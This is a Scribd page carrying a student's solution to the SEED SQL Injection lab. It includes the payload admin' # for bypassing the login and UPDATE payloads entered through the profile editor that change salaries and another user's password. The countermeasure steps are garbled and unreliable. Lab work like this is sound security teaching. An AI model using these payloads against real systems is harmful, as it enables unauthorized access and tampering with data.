Scribd
Upload
11 views

SQL Injection Attack Lab

Uploaded by

kelvin03zine
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
11 views

SQL Injection Attack Lab

Uploaded by

kelvin03zine
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 14

Information

Security

SQL Injection Attack Lab

Muhammad Irfan
BCS-18-43
BS-CS 7th Sem. (M)
University of Sahiwal
SQL Injection Attack Lab
Lab Tasks
Task 1: Get Familiar with SQL Statements

$ mysql -u root -pseedubuntu


mysql> show databases;
mysql> use Users;
mysql> show tables;
mysql> select * from credential where name = ‘Alice’;
Task 2.1: SQL Injection Attack from webpage.
Type “ admin’ # ” in the Username field and leave empty the password field.
Task 2.2: SQL Injection Attack from command line.
Write Code on Terminator in Seed Lab:
curl
'http://www.seedlabsqlinjection.com/unsafe_home.php?username=Admin%27%
20%23';
Task 3.1: Modify your own salary.
As shown in the Edit Profile page, employees can only update their nicknames, emails, addresses, phone
numbers, and passwords; they are not authorized to change their salaries. Assume that I am Alice. I
want to increase my own salary by exploiting the SQL injection vulnerability in the Edit-Profile page. I
know that salaries are stored in a column called salary.

I will use the statement ine the NickName field: ', Salary=10000 where name = ‘Alice’ #

Salary before statement:


Salary after statement:

Task 3.2: Modify other people’ salary.


I want to reduce Boby’s salary to 1 dollar.
Use statement in Alice’s profile editor: ', Salary=1 where name = ‘Boby’ #
Task 3.3: Modify other people’ password.
I want to change Boby’s password that I can log into his account and do further
damage.
It uses SHA1 hash function to generate the hash value of password.
Use the following statement:
echo -n “tedwashere” | sha1sum

Copy the code you get and paste in Alice’s profile editor as the following
statement:
', password=(code you copied) where name = ‘Boby’ #
Boby’s password before and after;
Task 4: Countermeasure — Prepared Statement.
seed@VM:-$ /var/www/SQLInjection/ bash: /var/www/SQL Injection/: Is a directory
seed@VM:-$ cd /var/www/SQLInjection/
seed@VM: .../SQLInjections ls
seed@VM:.../SQLInjections subl safe_home.php
seed@VM:.../SQLInjection$ subl unsafe_home.php
After exicute these codes copy the code from line 70 to 80 in SAFE_HOME_PHP and paste over
the line 70 to 100 in UNSAFE_HOME_PHP file then save the code file.
after saving run these codes in terminal.
[10/30/21] seed@VM: .../SOLInjection$ cd ..
[10/30/21] seed@VM:.../www$ cd..
[10/30/21] seed@VM:/var$ cd
[10/30/21] 11seed@VM:/$ sudo service apache2 reset
[10/30/211seed@VM:/$
GitHub Repository Link:
HMIrfan2599 (github.com)

HMIrfan2599/SEED-SQL-Injection-Lab: Solution of the SEED SQL


Injection Lab (github.com)

You might also like